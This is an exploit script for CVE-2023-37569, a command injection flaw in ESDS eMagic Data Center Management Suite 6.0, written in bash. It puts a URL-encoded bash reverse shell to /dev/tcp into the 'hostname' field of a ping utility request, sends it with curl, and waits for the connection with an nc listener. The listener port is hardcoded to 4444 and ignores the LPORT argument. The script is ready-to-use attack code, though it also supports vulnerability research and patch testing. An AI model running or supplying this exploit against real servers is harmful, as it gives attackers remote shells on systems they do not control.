Emagic Data Center Management Suite v6.0 - OS Command Injection - CVE-2023-37569

1. #!/bin/bash
2.  
3. # Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
4. # Date: 03-08-2023
5. # Exploit Author: Shubham Pandey & thewhiteh4t
6. # Vendor Homepage: https://www.esds.co.in/enlight360
7. # Version: 6.0.0
8. # Tested on: Kali Linux
9. # CVE : CVE-2023-37569
10.  
11. URL=$1
12. LHOST=$2
13. LPORT=$3
14.  
15. echo "*****************************"
16. echo "*  ESDS eMagic 6.0.0 RCE    *"
17. echo "*  > CVE-2023-37569         *"
18. echo "*  > Shubham & thewhiteh4t  *"
19. echo "*****************************"
20.  
21. if [ $# -lt 3 ]; then
22.     echo """
23. USAGE :
24.  
25. ./exploit.sh http://<IP> <LHOST> <LPORT>
26. ./exploit.sh http://192.168.0.10 192.168.0.20 1337
27. """
28.     exit 1
29. fi
30.  
31. url="$1/index.php/monitor/operations/utilities/"
32.  
33. echo "[+] URL   : $URL"
34. echo "[+] LHOST : $LHOST"
35. echo "[+] LPORT : $LPORT"
36. echo
37.  
38. payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
39.  
40. post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"
41.  
42. echo "[!] Triggering exploit..."
43.  
44. echo $url
45.  
46. (sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
47.  
48. echo "[+] Catching shell..."
49. nc -lvp 4444
50.